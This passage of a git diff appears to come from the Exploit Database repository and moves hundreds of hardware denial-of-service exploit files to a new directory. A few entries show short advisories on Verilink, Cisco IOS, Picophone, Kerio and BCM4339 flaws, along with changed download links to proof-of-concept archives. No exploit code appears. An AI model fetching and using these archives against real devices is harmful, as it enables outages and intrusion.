platforms/hardware/dos/21736.txt rename to exploits/hardware/dos/21736.txt diff --git a/platforms/hardware/dos/21756.txt b/exploits/hardware/dos/21756.txt similarity index 100% rename from platforms/hardware/dos/21756.txt rename to exploits/hardware/dos/21756.txt diff --git a/platforms/hardware/dos/2176.html b/exploits/hardware/dos/2176.html similarity index 100% rename from platforms/hardware/dos/2176.html rename to exploits/hardware/dos/2176.html diff --git a/platforms/hardware/dos/21770.c b/exploits/hardware/dos/21770.c similarity index 100% rename from platforms/hardware/dos/21770.c rename to exploits/hardware/dos/21770.c diff --git a/platforms/hardware/dos/21791.txt b/exploits/hardware/dos/21791.txt similarity index 100% rename from platforms/hardware/dos/21791.txt rename to exploits/hardware/dos/21791.txt diff --git a/platforms/hardware/dos/21828.txt b/exploits/hardware/dos/21828.txt similarity index 100% rename from platforms/hardware/dos/21828.txt rename to exploits/hardware/dos/21828.txt diff --git a/platforms/hardware/dos/21939.txt b/exploits/hardware/dos/21939.txt similarity index 100% rename from platforms/hardware/dos/21939.txt rename to exploits/hardware/dos/21939.txt diff --git a/platforms/hardware/dos/21971.txt b/exploits/hardware/dos/21971.txt similarity index 100% rename from platforms/hardware/dos/21971.txt rename to exploits/hardware/dos/21971.txt diff --git a/platforms/hardware/dos/21975.txt b/exploits/hardware/dos/21975.txt similarity index 100% rename from platforms/hardware/dos/21975.txt rename to exploits/hardware/dos/21975.txt diff --git a/platforms/hardware/dos/21978.txt b/exploits/hardware/dos/21978.txt similarity index 100% rename from platforms/hardware/dos/21978.txt rename to exploits/hardware/dos/21978.txt diff --git a/platforms/hardware/dos/22060.txt b/exploits/hardware/dos/22060.txt similarity index 100% rename from platforms/hardware/dos/22060.txt rename to exploits/hardware/dos/22060.txt diff --git a/platforms/hardware/dos/22062.py b/exploits/hardware/dos/22062.py similarity index 100% rename from platforms/hardware/dos/22062.py rename to exploits/hardware/dos/22062.py diff --git a/platforms/hardware/dos/22407.txt b/exploits/hardware/dos/22407.txt similarity index 100% rename from platforms/hardware/dos/22407.txt rename to exploits/hardware/dos/22407.txt diff --git a/platforms/hardware/dos/22415.c b/exploits/hardware/dos/22415.c similarity index 100% rename from platforms/hardware/dos/22415.c rename to exploits/hardware/dos/22415.c diff --git a/platforms/hardware/dos/22440.c b/exploits/hardware/dos/22440.c similarity index 100% rename from platforms/hardware/dos/22440.c rename to exploits/hardware/dos/22440.c diff --git a/platforms/hardware/dos/2246.cpp b/exploits/hardware/dos/2246.cpp similarity index 100% rename from platforms/hardware/dos/2246.cpp rename to exploits/hardware/dos/2246.cpp diff --git a/platforms/hardware/dos/22596.txt b/exploits/hardware/dos/22596.txt similarity index 89% rename from platforms/hardware/dos/22596.txt rename to exploits/hardware/dos/22596.txt index 2362e434f..18d37b42c 100644 --- a/platforms/hardware/dos/22596.txt +++ b/exploits/hardware/dos/22596.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7575/info It has been reported that a problem with Verilink broadband routers exists in the handling of TFTP packets. Because of this, an attacker could potentially deny service to legitimate users of the network. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22596.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22596.zip \ No newline at end of file diff --git a/platforms/hardware/dos/22647.txt b/exploits/hardware/dos/22647.txt similarity index 100% rename from platforms/hardware/dos/22647.txt rename to exploits/hardware/dos/22647.txt diff --git a/platforms/hardware/dos/22739.py b/exploits/hardware/dos/22739.py similarity index 100% rename from platforms/hardware/dos/22739.py rename to exploits/hardware/dos/22739.py diff --git a/platforms/hardware/dos/22797.txt b/exploits/hardware/dos/22797.txt similarity index 100% rename from platforms/hardware/dos/22797.txt rename to exploits/hardware/dos/22797.txt diff --git a/platforms/hardware/dos/22876.txt b/exploits/hardware/dos/22876.txt similarity index 100% rename from platforms/hardware/dos/22876.txt rename to exploits/hardware/dos/22876.txt diff --git a/platforms/hardware/dos/22947.c b/exploits/hardware/dos/22947.c similarity index 100% rename from platforms/hardware/dos/22947.c rename to exploits/hardware/dos/22947.c diff --git a/platforms/hardware/dos/22950.txt b/exploits/hardware/dos/22950.txt similarity index 100% rename from platforms/hardware/dos/22950.txt rename to exploits/hardware/dos/22950.txt diff --git a/platforms/hardware/dos/22962.pl b/exploits/hardware/dos/22962.pl similarity index 100% rename from platforms/hardware/dos/22962.pl rename to exploits/hardware/dos/22962.pl diff --git a/platforms/hardware/dos/22978.txt b/exploits/hardware/dos/22978.txt similarity index 89% rename from platforms/hardware/dos/22978.txt rename to exploits/hardware/dos/22978.txt index bba9f86ad..85747bd26 100644 --- a/platforms/hardware/dos/22978.txt +++ b/exploits/hardware/dos/22978.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/8323/info It has been reported that under some circumstances, a Cisco appliance running IOS may answer malicious malformed UDP echo packets with replies that contain partial contents from the affected router's memory. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22978.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22978.tgz \ No newline at end of file diff --git a/platforms/hardware/dos/22983.txt b/exploits/hardware/dos/22983.txt similarity index 100% rename from platforms/hardware/dos/22983.txt rename to exploits/hardware/dos/22983.txt diff --git a/platforms/hardware/dos/22991.txt b/exploits/hardware/dos/22991.txt similarity index 100% rename from platforms/hardware/dos/22991.txt rename to exploits/hardware/dos/22991.txt diff --git a/platforms/hardware/dos/23087.c b/exploits/hardware/dos/23087.c similarity index 100% rename from platforms/hardware/dos/23087.c rename to exploits/hardware/dos/23087.c diff --git a/platforms/hardware/dos/23190.pl b/exploits/hardware/dos/23190.pl similarity index 100% rename from platforms/hardware/dos/23190.pl rename to exploits/hardware/dos/23190.pl diff --git a/platforms/hardware/dos/23361.txt b/exploits/hardware/dos/23361.txt similarity index 100% rename from platforms/hardware/dos/23361.txt rename to exploits/hardware/dos/23361.txt diff --git a/platforms/hardware/dos/23394.c b/exploits/hardware/dos/23394.c similarity index 100% rename from platforms/hardware/dos/23394.c rename to exploits/hardware/dos/23394.c diff --git a/platforms/hardware/dos/23508.txt b/exploits/hardware/dos/23508.txt similarity index 100% rename from platforms/hardware/dos/23508.txt rename to exploits/hardware/dos/23508.txt diff --git a/platforms/hardware/dos/23638.pl b/exploits/hardware/dos/23638.pl similarity index 100% rename from platforms/hardware/dos/23638.pl rename to exploits/hardware/dos/23638.pl diff --git a/platforms/hardware/dos/23672.txt b/exploits/hardware/dos/23672.txt similarity index 100% rename from platforms/hardware/dos/23672.txt rename to exploits/hardware/dos/23672.txt diff --git a/platforms/hardware/dos/23778.c b/exploits/hardware/dos/23778.c similarity index 100% rename from platforms/hardware/dos/23778.c rename to exploits/hardware/dos/23778.c diff --git a/platforms/hardware/dos/23786.c b/exploits/hardware/dos/23786.c similarity index 100% rename from platforms/hardware/dos/23786.c rename to exploits/hardware/dos/23786.c diff --git a/platforms/hardware/dos/23788.pl b/exploits/hardware/dos/23788.pl similarity index 100% rename from platforms/hardware/dos/23788.pl rename to exploits/hardware/dos/23788.pl diff --git a/platforms/hardware/dos/23789.c b/exploits/hardware/dos/23789.c similarity index 100% rename from platforms/hardware/dos/23789.c rename to exploits/hardware/dos/23789.c diff --git a/platforms/hardware/dos/23876.txt b/exploits/hardware/dos/23876.txt similarity index 93% rename from platforms/hardware/dos/23876.txt rename to exploits/hardware/dos/23876.txt index 6d1d2853e..06dbc324e 100644 --- a/platforms/hardware/dos/23876.txt +++ b/exploits/hardware/dos/23876.txt @@ -4,4 +4,4 @@ It has been reported that Picophone is prone to a remote buffer overflow vulnera Successful exploitation of this issue will cause a denial of service condition to be triggered. The attacker may also leverage this issue to execute arbitrary code; this code would be executed in the security context of the user running the affected process. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23876.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23876.zip \ No newline at end of file diff --git a/platforms/hardware/dos/23900.txt b/exploits/hardware/dos/23900.txt similarity index 94% rename from platforms/hardware/dos/23900.txt rename to exploits/hardware/dos/23900.txt index 9b0d03f74..249ff0401 100644 --- a/platforms/hardware/dos/23900.txt +++ b/exploits/hardware/dos/23900.txt @@ -6,4 +6,4 @@ If an attacker is able to overwrite sensitive memory locations, it may be possib All versions of cdp are assumed to be vulnerable to this issue. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23900.tgz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23900.tgz \ No newline at end of file diff --git a/platforms/hardware/dos/24023.py b/exploits/hardware/dos/24023.py similarity index 100% rename from platforms/hardware/dos/24023.py rename to exploits/hardware/dos/24023.py diff --git a/platforms/hardware/dos/24143.c b/exploits/hardware/dos/24143.c similarity index 100% rename from platforms/hardware/dos/24143.c rename to exploits/hardware/dos/24143.c diff --git a/platforms/hardware/dos/24344.txt b/exploits/hardware/dos/24344.txt similarity index 100% rename from platforms/hardware/dos/24344.txt rename to exploits/hardware/dos/24344.txt diff --git a/platforms/hardware/dos/24839.c b/exploits/hardware/dos/24839.c similarity index 100% rename from platforms/hardware/dos/24839.c rename to exploits/hardware/dos/24839.c diff --git a/platforms/hardware/dos/24866.txt b/exploits/hardware/dos/24866.txt similarity index 100% rename from platforms/hardware/dos/24866.txt rename to exploits/hardware/dos/24866.txt diff --git a/platforms/hardware/dos/24896.sh b/exploits/hardware/dos/24896.sh similarity index 100% rename from platforms/hardware/dos/24896.sh rename to exploits/hardware/dos/24896.sh diff --git a/platforms/hardware/dos/25082.txt b/exploits/hardware/dos/25082.txt similarity index 100% rename from platforms/hardware/dos/25082.txt rename to exploits/hardware/dos/25082.txt diff --git a/platforms/hardware/dos/25107.txt b/exploits/hardware/dos/25107.txt similarity index 100% rename from platforms/hardware/dos/25107.txt rename to exploits/hardware/dos/25107.txt diff --git a/platforms/hardware/dos/25124.txt b/exploits/hardware/dos/25124.txt similarity index 100% rename from platforms/hardware/dos/25124.txt rename to exploits/hardware/dos/25124.txt diff --git a/platforms/hardware/dos/25277.txt b/exploits/hardware/dos/25277.txt similarity index 100% rename from platforms/hardware/dos/25277.txt rename to exploits/hardware/dos/25277.txt diff --git a/platforms/hardware/dos/25295.txt b/exploits/hardware/dos/25295.txt similarity index 100% rename from platforms/hardware/dos/25295.txt rename to exploits/hardware/dos/25295.txt diff --git a/platforms/hardware/dos/25402.txt b/exploits/hardware/dos/25402.txt similarity index 100% rename from platforms/hardware/dos/25402.txt rename to exploits/hardware/dos/25402.txt diff --git a/platforms/hardware/dos/25711.txt b/exploits/hardware/dos/25711.txt similarity index 100% rename from platforms/hardware/dos/25711.txt rename to exploits/hardware/dos/25711.txt diff --git a/platforms/hardware/dos/25736.txt b/exploits/hardware/dos/25736.txt similarity index 100% rename from platforms/hardware/dos/25736.txt rename to exploits/hardware/dos/25736.txt diff --git a/platforms/hardware/dos/25967.txt b/exploits/hardware/dos/25967.txt similarity index 100% rename from platforms/hardware/dos/25967.txt rename to exploits/hardware/dos/25967.txt diff --git a/platforms/hardware/dos/26076.py b/exploits/hardware/dos/26076.py similarity index 100% rename from platforms/hardware/dos/26076.py rename to exploits/hardware/dos/26076.py diff --git a/platforms/hardware/dos/26138.txt b/exploits/hardware/dos/26138.txt similarity index 100% rename from platforms/hardware/dos/26138.txt rename to exploits/hardware/dos/26138.txt diff --git a/platforms/hardware/dos/262.pl b/exploits/hardware/dos/262.pl similarity index 100% rename from platforms/hardware/dos/262.pl rename to exploits/hardware/dos/262.pl diff --git a/platforms/hardware/dos/26233.txt b/exploits/hardware/dos/26233.txt similarity index 100% rename from platforms/hardware/dos/26233.txt rename to exploits/hardware/dos/26233.txt diff --git a/platforms/hardware/dos/26548.pl b/exploits/hardware/dos/26548.pl similarity index 100% rename from platforms/hardware/dos/26548.pl rename to exploits/hardware/dos/26548.pl diff --git a/platforms/hardware/dos/26754.txt b/exploits/hardware/dos/26754.txt similarity index 100% rename from platforms/hardware/dos/26754.txt rename to exploits/hardware/dos/26754.txt diff --git a/platforms/hardware/dos/26802.py b/exploits/hardware/dos/26802.py similarity index 100% rename from platforms/hardware/dos/26802.py rename to exploits/hardware/dos/26802.py diff --git a/platforms/hardware/dos/26825.txt b/exploits/hardware/dos/26825.txt similarity index 100% rename from platforms/hardware/dos/26825.txt rename to exploits/hardware/dos/26825.txt diff --git a/platforms/hardware/dos/26833.txt b/exploits/hardware/dos/26833.txt similarity index 100% rename from platforms/hardware/dos/26833.txt rename to exploits/hardware/dos/26833.txt diff --git a/platforms/hardware/dos/26834.txt b/exploits/hardware/dos/26834.txt similarity index 100% rename from platforms/hardware/dos/26834.txt rename to exploits/hardware/dos/26834.txt diff --git a/platforms/hardware/dos/26835.txt b/exploits/hardware/dos/26835.txt similarity index 100% rename from platforms/hardware/dos/26835.txt rename to exploits/hardware/dos/26835.txt diff --git a/platforms/hardware/dos/2700.rb b/exploits/hardware/dos/2700.rb similarity index 100% rename from platforms/hardware/dos/2700.rb rename to exploits/hardware/dos/2700.rb diff --git a/platforms/hardware/dos/27043.py b/exploits/hardware/dos/27043.py similarity index 100% rename from platforms/hardware/dos/27043.py rename to exploits/hardware/dos/27043.py diff --git a/platforms/hardware/dos/27131.py b/exploits/hardware/dos/27131.py similarity index 100% rename from platforms/hardware/dos/27131.py rename to exploits/hardware/dos/27131.py diff --git a/platforms/hardware/dos/27232.txt b/exploits/hardware/dos/27232.txt similarity index 100% rename from platforms/hardware/dos/27232.txt rename to exploits/hardware/dos/27232.txt diff --git a/platforms/hardware/dos/27241.c b/exploits/hardware/dos/27241.c similarity index 100% rename from platforms/hardware/dos/27241.c rename to exploits/hardware/dos/27241.c diff --git a/platforms/hardware/dos/27749.rb b/exploits/hardware/dos/27749.rb similarity index 100% rename from platforms/hardware/dos/27749.rb rename to exploits/hardware/dos/27749.rb diff --git a/platforms/hardware/dos/27775.py b/exploits/hardware/dos/27775.py similarity index 100% rename from platforms/hardware/dos/27775.py rename to exploits/hardware/dos/27775.py diff --git a/platforms/hardware/dos/27942.txt b/exploits/hardware/dos/27942.txt similarity index 100% rename from platforms/hardware/dos/27942.txt rename to exploits/hardware/dos/27942.txt diff --git a/platforms/hardware/dos/28228.txt b/exploits/hardware/dos/28228.txt similarity index 94% rename from platforms/hardware/dos/28228.txt rename to exploits/hardware/dos/28228.txt index a01f6e60b..e1b77ca3d 100644 --- a/platforms/hardware/dos/28228.txt +++ b/exploits/hardware/dos/28228.txt @@ -6,4 +6,4 @@ Exploitation of this vulnerability could cause the firewall application to crash The individual who discovered this vulnerability claims to have tested it on Sunbelt Kerio Personal Firewall versions 4.3.246 and 4.2.3.912. They were unable to reproduce the vulnerability on version 4.2.3.912, which is an older release. The vulnerable functionality may have been introduced at some point after the 4.2.3.912 release, but this has not been confirmed. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/28228.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/28228.zip \ No newline at end of file diff --git a/platforms/hardware/dos/28230.txt b/exploits/hardware/dos/28230.txt similarity index 100% rename from platforms/hardware/dos/28230.txt rename to exploits/hardware/dos/28230.txt diff --git a/platforms/hardware/dos/28271.py b/exploits/hardware/dos/28271.py similarity index 100% rename from platforms/hardware/dos/28271.py rename to exploits/hardware/dos/28271.py diff --git a/platforms/hardware/dos/28739.pl b/exploits/hardware/dos/28739.pl similarity index 100% rename from platforms/hardware/dos/28739.pl rename to exploits/hardware/dos/28739.pl diff --git a/platforms/hardware/dos/28852.py b/exploits/hardware/dos/28852.py similarity index 100% rename from platforms/hardware/dos/28852.py rename to exploits/hardware/dos/28852.py diff --git a/platforms/hardware/dos/2915.c b/exploits/hardware/dos/2915.c similarity index 100% rename from platforms/hardware/dos/2915.c rename to exploits/hardware/dos/2915.c diff --git a/platforms/hardware/dos/29297.py b/exploits/hardware/dos/29297.py similarity index 100% rename from platforms/hardware/dos/29297.py rename to exploits/hardware/dos/29297.py diff --git a/platforms/hardware/dos/29402.txt b/exploits/hardware/dos/29402.txt similarity index 100% rename from platforms/hardware/dos/29402.txt rename to exploits/hardware/dos/29402.txt diff --git a/platforms/hardware/dos/2961.py b/exploits/hardware/dos/2961.py similarity index 100% rename from platforms/hardware/dos/2961.py rename to exploits/hardware/dos/2961.py diff --git a/platforms/hardware/dos/29767.txt b/exploits/hardware/dos/29767.txt similarity index 100% rename from platforms/hardware/dos/29767.txt rename to exploits/hardware/dos/29767.txt diff --git a/platforms/hardware/dos/29919.py b/exploits/hardware/dos/29919.py similarity index 100% rename from platforms/hardware/dos/29919.py rename to exploits/hardware/dos/29919.py diff --git a/platforms/hardware/dos/30167.txt b/exploits/hardware/dos/30167.txt similarity index 100% rename from platforms/hardware/dos/30167.txt rename to exploits/hardware/dos/30167.txt diff --git a/platforms/hardware/dos/30506.txt b/exploits/hardware/dos/30506.txt similarity index 100% rename from platforms/hardware/dos/30506.txt rename to exploits/hardware/dos/30506.txt diff --git a/platforms/hardware/dos/30517.pl b/exploits/hardware/dos/30517.pl similarity index 100% rename from platforms/hardware/dos/30517.pl rename to exploits/hardware/dos/30517.pl diff --git a/platforms/hardware/dos/30530.pl b/exploits/hardware/dos/30530.pl similarity index 100% rename from platforms/hardware/dos/30530.pl rename to exploits/hardware/dos/30530.pl diff --git a/platforms/hardware/dos/30538.pl b/exploits/hardware/dos/30538.pl similarity index 100% rename from platforms/hardware/dos/30538.pl rename to exploits/hardware/dos/30538.pl diff --git a/platforms/hardware/dos/30679.pl b/exploits/hardware/dos/30679.pl similarity index 100% rename from platforms/hardware/dos/30679.pl rename to exploits/hardware/dos/30679.pl diff --git a/platforms/hardware/dos/30688.py b/exploits/hardware/dos/30688.py similarity index 100% rename from platforms/hardware/dos/30688.py rename to exploits/hardware/dos/30688.py diff --git a/platforms/hardware/dos/31102.c b/exploits/hardware/dos/31102.c similarity index 100% rename from platforms/hardware/dos/31102.c rename to exploits/hardware/dos/31102.c diff --git a/platforms/hardware/dos/31306.txt b/exploits/hardware/dos/31306.txt similarity index 100% rename from platforms/hardware/dos/31306.txt rename to exploits/hardware/dos/31306.txt diff --git a/platforms/hardware/dos/31478.txt b/exploits/hardware/dos/31478.txt similarity index 100% rename from platforms/hardware/dos/31478.txt rename to exploits/hardware/dos/31478.txt diff --git a/platforms/hardware/dos/31884.txt b/exploits/hardware/dos/31884.txt similarity index 100% rename from platforms/hardware/dos/31884.txt rename to exploits/hardware/dos/31884.txt diff --git a/platforms/hardware/dos/32305.txt b/exploits/hardware/dos/32305.txt similarity index 100% rename from platforms/hardware/dos/32305.txt rename to exploits/hardware/dos/32305.txt diff --git a/platforms/hardware/dos/32341.html b/exploits/hardware/dos/32341.html similarity index 100% rename from platforms/hardware/dos/32341.html rename to exploits/hardware/dos/32341.html diff --git a/platforms/hardware/dos/32472.txt b/exploits/hardware/dos/32472.txt similarity index 100% rename from platforms/hardware/dos/32472.txt rename to exploits/hardware/dos/32472.txt diff --git a/platforms/hardware/dos/32583.txt b/exploits/hardware/dos/32583.txt similarity index 100% rename from platforms/hardware/dos/32583.txt rename to exploits/hardware/dos/32583.txt diff --git a/platforms/hardware/dos/32692.txt b/exploits/hardware/dos/32692.txt similarity index 100% rename from platforms/hardware/dos/32692.txt rename to exploits/hardware/dos/32692.txt diff --git a/platforms/hardware/dos/32702.txt b/exploits/hardware/dos/32702.txt similarity index 100% rename from platforms/hardware/dos/32702.txt rename to exploits/hardware/dos/32702.txt diff --git a/platforms/hardware/dos/33216.txt b/exploits/hardware/dos/33216.txt similarity index 100% rename from platforms/hardware/dos/33216.txt rename to exploits/hardware/dos/33216.txt diff --git a/platforms/hardware/dos/33280.txt b/exploits/hardware/dos/33280.txt similarity index 100% rename from platforms/hardware/dos/33280.txt rename to exploits/hardware/dos/33280.txt diff --git a/platforms/hardware/dos/33328.txt b/exploits/hardware/dos/33328.txt similarity index 100% rename from platforms/hardware/dos/33328.txt rename to exploits/hardware/dos/33328.txt diff --git a/platforms/hardware/dos/33476.pl b/exploits/hardware/dos/33476.pl similarity index 100% rename from platforms/hardware/dos/33476.pl rename to exploits/hardware/dos/33476.pl diff --git a/platforms/hardware/dos/33583.pl b/exploits/hardware/dos/33583.pl similarity index 100% rename from platforms/hardware/dos/33583.pl rename to exploits/hardware/dos/33583.pl diff --git a/platforms/hardware/dos/33737.py b/exploits/hardware/dos/33737.py similarity index 100% rename from platforms/hardware/dos/33737.py rename to exploits/hardware/dos/33737.py diff --git a/platforms/hardware/dos/34172.txt b/exploits/hardware/dos/34172.txt similarity index 100% rename from platforms/hardware/dos/34172.txt rename to exploits/hardware/dos/34172.txt diff --git a/platforms/hardware/dos/34203.txt b/exploits/hardware/dos/34203.txt similarity index 100% rename from platforms/hardware/dos/34203.txt rename to exploits/hardware/dos/34203.txt diff --git a/platforms/hardware/dos/34306.txt b/exploits/hardware/dos/34306.txt similarity index 100% rename from platforms/hardware/dos/34306.txt rename to exploits/hardware/dos/34306.txt diff --git a/platforms/hardware/dos/34307.txt b/exploits/hardware/dos/34307.txt similarity index 100% rename from platforms/hardware/dos/34307.txt rename to exploits/hardware/dos/34307.txt diff --git a/platforms/hardware/dos/34394.pl b/exploits/hardware/dos/34394.pl similarity index 100% rename from platforms/hardware/dos/34394.pl rename to exploits/hardware/dos/34394.pl diff --git a/platforms/hardware/dos/3526.pl b/exploits/hardware/dos/3526.pl similarity index 100% rename from platforms/hardware/dos/3526.pl rename to exploits/hardware/dos/3526.pl diff --git a/platforms/hardware/dos/35345.txt b/exploits/hardware/dos/35345.txt similarity index 100% rename from platforms/hardware/dos/35345.txt rename to exploits/hardware/dos/35345.txt diff --git a/platforms/hardware/dos/3535.pl b/exploits/hardware/dos/3535.pl similarity index 100% rename from platforms/hardware/dos/3535.pl rename to exploits/hardware/dos/3535.pl diff --git a/platforms/hardware/dos/358.txt b/exploits/hardware/dos/358.txt similarity index 100% rename from platforms/hardware/dos/358.txt rename to exploits/hardware/dos/358.txt diff --git a/platforms/hardware/dos/35859.py b/exploits/hardware/dos/35859.py similarity index 100% rename from platforms/hardware/dos/35859.py rename to exploits/hardware/dos/35859.py diff --git a/platforms/hardware/dos/35939.txt b/exploits/hardware/dos/35939.txt similarity index 100% rename from platforms/hardware/dos/35939.txt rename to exploits/hardware/dos/35939.txt diff --git a/platforms/hardware/dos/363.txt b/exploits/hardware/dos/363.txt similarity index 100% rename from platforms/hardware/dos/363.txt rename to exploits/hardware/dos/363.txt diff --git a/platforms/hardware/dos/36309.py b/exploits/hardware/dos/36309.py similarity index 100% rename from platforms/hardware/dos/36309.py rename to exploits/hardware/dos/36309.py diff --git a/platforms/hardware/dos/36825.php b/exploits/hardware/dos/36825.php similarity index 100% rename from platforms/hardware/dos/36825.php rename to exploits/hardware/dos/36825.php diff --git a/platforms/hardware/dos/36868.pl b/exploits/hardware/dos/36868.pl similarity index 100% rename from platforms/hardware/dos/36868.pl rename to exploits/hardware/dos/36868.pl diff --git a/platforms/hardware/dos/37199.txt b/exploits/hardware/dos/37199.txt similarity index 100% rename from platforms/hardware/dos/37199.txt rename to exploits/hardware/dos/37199.txt diff --git a/platforms/hardware/dos/37517.pl b/exploits/hardware/dos/37517.pl similarity index 100% rename from platforms/hardware/dos/37517.pl rename to exploits/hardware/dos/37517.pl diff --git a/platforms/hardware/dos/3791.pl b/exploits/hardware/dos/3791.pl similarity index 100% rename from platforms/hardware/dos/3791.pl rename to exploits/hardware/dos/3791.pl diff --git a/platforms/hardware/dos/3792.pl b/exploits/hardware/dos/3792.pl similarity index 100% rename from platforms/hardware/dos/3792.pl rename to exploits/hardware/dos/3792.pl diff --git a/platforms/hardware/dos/38475.txt b/exploits/hardware/dos/38475.txt similarity index 100% rename from platforms/hardware/dos/38475.txt rename to exploits/hardware/dos/38475.txt diff --git a/platforms/hardware/dos/38483.txt b/exploits/hardware/dos/38483.txt similarity index 100% rename from platforms/hardware/dos/38483.txt rename to exploits/hardware/dos/38483.txt diff --git a/platforms/hardware/dos/38493.txt b/exploits/hardware/dos/38493.txt similarity index 100% rename from platforms/hardware/dos/38493.txt rename to exploits/hardware/dos/38493.txt diff --git a/platforms/hardware/dos/38566.py b/exploits/hardware/dos/38566.py similarity index 100% rename from platforms/hardware/dos/38566.py rename to exploits/hardware/dos/38566.py diff --git a/platforms/hardware/dos/39225.txt b/exploits/hardware/dos/39225.txt similarity index 100% rename from platforms/hardware/dos/39225.txt rename to exploits/hardware/dos/39225.txt diff --git a/platforms/hardware/dos/39315.pl b/exploits/hardware/dos/39315.pl similarity index 100% rename from platforms/hardware/dos/39315.pl rename to exploits/hardware/dos/39315.pl diff --git a/platforms/hardware/dos/39706.txt b/exploits/hardware/dos/39706.txt similarity index 100% rename from platforms/hardware/dos/39706.txt rename to exploits/hardware/dos/39706.txt diff --git a/platforms/hardware/dos/40014.txt b/exploits/hardware/dos/40014.txt similarity index 100% rename from platforms/hardware/dos/40014.txt rename to exploits/hardware/dos/40014.txt diff --git a/platforms/hardware/dos/40289.txt b/exploits/hardware/dos/40289.txt similarity index 100% rename from platforms/hardware/dos/40289.txt rename to exploits/hardware/dos/40289.txt diff --git a/platforms/hardware/dos/40687.txt b/exploits/hardware/dos/40687.txt similarity index 100% rename from platforms/hardware/dos/40687.txt rename to exploits/hardware/dos/40687.txt diff --git a/platforms/hardware/dos/40814.txt b/exploits/hardware/dos/40814.txt similarity index 100% rename from platforms/hardware/dos/40814.txt rename to exploits/hardware/dos/40814.txt diff --git a/platforms/hardware/dos/40886.py b/exploits/hardware/dos/40886.py similarity index 100% rename from platforms/hardware/dos/40886.py rename to exploits/hardware/dos/40886.py diff --git a/platforms/hardware/dos/40910.txt b/exploits/hardware/dos/40910.txt similarity index 100% rename from platforms/hardware/dos/40910.txt rename to exploits/hardware/dos/40910.txt diff --git a/platforms/hardware/dos/41219.txt b/exploits/hardware/dos/41219.txt similarity index 100% rename from platforms/hardware/dos/41219.txt rename to exploits/hardware/dos/41219.txt diff --git a/platforms/hardware/dos/41369.txt b/exploits/hardware/dos/41369.txt similarity index 100% rename from platforms/hardware/dos/41369.txt rename to exploits/hardware/dos/41369.txt diff --git a/platforms/hardware/dos/41537.py b/exploits/hardware/dos/41537.py similarity index 100% rename from platforms/hardware/dos/41537.py rename to exploits/hardware/dos/41537.py diff --git a/platforms/hardware/dos/41565.py b/exploits/hardware/dos/41565.py similarity index 100% rename from platforms/hardware/dos/41565.py rename to exploits/hardware/dos/41565.py diff --git a/platforms/hardware/dos/41601.c b/exploits/hardware/dos/41601.c similarity index 100% rename from platforms/hardware/dos/41601.c rename to exploits/hardware/dos/41601.c diff --git a/platforms/hardware/dos/41643.txt b/exploits/hardware/dos/41643.txt similarity index 100% rename from platforms/hardware/dos/41643.txt rename to exploits/hardware/dos/41643.txt diff --git a/platforms/hardware/dos/41752.pl b/exploits/hardware/dos/41752.pl similarity index 100% rename from platforms/hardware/dos/41752.pl rename to exploits/hardware/dos/41752.pl diff --git a/platforms/hardware/dos/41806.txt b/exploits/hardware/dos/41806.txt similarity index 98% rename from platforms/hardware/dos/41806.txt rename to exploits/hardware/dos/41806.txt index f097104b0..34dcd93b9 100644 --- a/platforms/hardware/dos/41806.txt +++ b/exploits/hardware/dos/41806.txt @@ -72,4 +72,4 @@ I've been able to verify this vulnerability on the BCM4339 chip, running version Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41806.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/41806.zip \ No newline at end of file diff --git a/platforms/hardware/dos/41826.txt b/exploits/hardware/dos/41826.txt similarity index 100% rename from platforms/hardware/dos/41826.txt rename to exploits/hardware/dos/41826.txt diff --git a/platforms/hardware/dos/42518.txt b/exploits/hardware/dos/42518.txt similarity index 100% rename from platforms/hardware/dos/42518.txt rename to exploits/hardware/dos/42518.txt diff --git a/platforms/hardware/dos/4297.pl b/exploits/hardware/dos/4297.pl similarity index 100% rename from platforms/hardware/dos/4297.pl rename to exploits/hardware/dos/4297.pl diff --git a/platforms/hardware/dos/4298.pl b/exploits/hardware/dos/4298.pl similarity index 100% rename from platforms/hardware/dos/4298.pl rename to exploits/hardware/dos/4298.pl diff --git a/platforms/hardware/dos/43119.py b/exploits/hardware/dos/43119.py similarity index 100% rename from platforms/hardware/dos/43119.py rename to exploits/hardware/dos/43119.py diff --git a/platforms/hardware/dos/43147.sh b/exploits/hardware/dos/43147.sh similarity index 100% rename from platforms/hardware/dos/43147.sh rename to exploits/hardware/dos/43147.sh diff --git a/platforms/hardware/dos/43164.py b/exploits/hardware/dos/43164.py similarity index 100% rename from platforms/hardware/dos/43164.py rename to exploits/hardware/dos/43164.py diff --git a/platforms/hardware/dos/4319.pl b/exploits/hardware/dos/4319.pl similarity index 100% rename from platforms/hardware/dos/4319.pl rename to exploits/hardware/dos/4319.pl diff --git a/platforms/hardware/dos/4426.pl b/exploits/hardware/dos/4426.pl similarity index 100% rename from platforms/hardware/dos/4426.pl rename to exploits/hardware/dos/4426.pl diff --git a/platforms/hardware/dos/4692.pl b/exploits/hardware/dos/4692.pl similarity index 100% rename from platforms/hardware/dos/4692.pl rename to exploits/hardware/dos/4692.pl diff --git a/platforms/hardware/dos/4978.html b/exploits/hardware/dos/4978.html similarity index 100% rename from platforms/hardware/dos/4978.html rename to exploits/hardware/dos/4978.html diff --git a/platforms/hardware/dos/5054.c b/exploits/hardware/dos/5054.c similarity index 100% rename from platforms/hardware/dos/5054.c rename to exploits/hardware/dos/5054.c diff --git a/platforms/hardware/dos/59.c b/exploits/hardware/dos/59.c similarity index 100% rename from platforms/hardware/dos/59.c rename to 